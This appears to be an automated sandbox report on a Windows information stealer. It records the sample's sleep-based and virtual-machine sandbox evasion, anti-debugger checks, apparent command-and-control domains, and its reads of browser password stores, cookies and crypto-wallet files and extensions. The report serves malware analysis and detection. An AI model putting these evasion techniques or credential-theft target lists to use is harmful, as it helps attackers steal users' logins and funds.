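Every entry with both a count and a time divides to exactly 2001 units per call (2742 calls totalling 5486742, 515 totalling 1030515, and so on), so the delay is one short fixed sleep repeated thousands of times rather than a few long ones. That matters for a sandbox that shortens or skips only long individual sleeps: the per-call value stays under any such cutoff while the total across the flagged threads exceeds twelve million units.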
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Comms
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\3D Objects
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, 00000000.00000002.3075665011.00000000002AA000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000003.3067177883.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3078293319.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3078400834.0000000000D43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000003.2544516259.000000000563A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.3078400834.0000000000D43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWL
Source: file.exe, 00000000.00000002.3075665011.00000000002AA000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: presticitpo.store
Source: file.exe, 00000000.00000002.3075965650.00000000002EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: file.exe, 00000000.00000003.3066838400.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067227914.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738702991.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: les%\Windows Defender\MsMpeng.exe
Source: file.exe, 00000000.00000003.3067157076.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067203130.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2728000075.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3078400834.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 2736, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: file.exe, 00000000.00000003.3067177883.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: file.exe, 00000000.00000003.3067177883.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: file.exe, 00000000.00000003.3067177883.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.2573744183.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
Source: file.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: file.exe, 00000000.00000003.3067177883.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: file.exe, 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
